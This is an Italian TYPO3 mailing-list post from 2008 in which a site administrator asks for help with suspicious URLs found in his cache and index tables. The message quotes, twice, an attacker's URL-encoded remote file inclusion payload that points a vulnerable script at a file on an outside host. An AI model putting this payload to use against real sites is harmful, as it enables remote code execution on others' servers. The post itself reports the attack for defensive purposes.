[TYPO3-UG Italy] info RFI Typo3 ver. 4.0.1
Igor Longagnani
i.longagnani at softlabs.it
Mon Feb 25 14:00:05 CET 2008
Salve da qualche settimana, pur non producendo danni veri e propri subisco
un attacco che fa sì che alcune pagine nelle tabelle CACHE_PAGES ed
INDEX_PHASH contengano URLs del tipo
http://www.<miodominio>.it/index.php?id=10&L=0%2F%2Fengine%2FMakeXML.php%3FfileOreonConf%3Dhttp%3A%2F%2Fwww.ourcolemanfamily.com%2Fgenealogy%2Fheadstones%2Fid.txt
a fronte di un url corretto
http://www.<miodominio>.it/index.php?id=10
avendo un'aggiunta "non corretta" del tipo
&L=0%2F%2Fengine%2FMakeXML.php%3FfileOreonConf%3Dhttp%3A%2F%2Fwww.ourcolemanfamily.com%2Fgenealogy%2Fheadstones%2Fid.txt
Ho visto che nel passato (ver. precedenti di Typo3) si poteva
forzare/controllare il valore della variabile L (language) affinchè fosse
un intero ... ( è tutto ancora valido)
Inoltre ho visto che nelle pagine che presentano "l'anomalia" non è stato
calcolato il cHash come da precisa illustrazione di Kasper
http://typo3.org/development/articles/the-mysteries-of-chash/
e ripreso in questa e-mail:
http://lists.netfielders.de/pipermail/typo3-project-tt-news/2006-January/000048.html
Conclusione e domanda :)
No ho trovato errori nel sito ne inclusioni strane nelle pagine ...solo
"lo sporco nel link", per ora sembra che nessuno sia entrato nel server...
Any idea, avete idee?
allego quello che ho trovato in rete tra i molti link poco signigifcativi
o per me incomprensibili
http://en.wikipedia.org/wiki/Remote_File_Inclusion
http://www.criticalsecurity.net/lofiversion/index.php/t22495.html
Grazie.
i.
--
Igor Longagnani c/o Softlabs
-------------------------------------------------------------------
e-mail: i.longagnani at softlabs.it phone : +39 059 558442
sede operativa: via Pirandello, 49/51 - 41043 Formigine (Mo) Italia
More information about the TYPO3-UG-italy
mailing list